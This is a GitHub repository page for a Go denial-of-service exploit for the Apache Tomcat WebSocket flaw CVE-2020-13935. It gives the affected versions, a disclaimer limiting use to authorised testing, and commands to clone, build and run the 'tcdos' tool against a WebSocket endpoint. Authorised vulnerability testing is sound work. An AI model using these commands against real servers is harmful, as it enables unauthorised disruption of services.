Skip to content

Exploit for WebSocket Vulnerability in Apache Tomcat

License

Notifications You must be signed in to change notification settings

1135/CVE-2020-13935

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

声明

此处提供的漏洞检测方法、文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者务必遵守法律规定,禁止在没有得到授权的情况下做任何漏洞检测。

漏洞信息

Affects:
9.0.0.M1 to 9.0.36

Usage

$ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
$ cd CVE-2020-13935
$ go build
$ ./tcdos [WebSocket endpoint]

# 例1
# 安装 Apache Tomcat 之后, 会有自带的examples 如http://localhost:8080/examples/websocket/echo.xhtml 这里就用到了websocket.
$ ./tcdos ws://localhost:8080/examples/websocket/echoProgrammatic

About

Exploit for WebSocket Vulnerability in Apache Tomcat

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Go 100.0%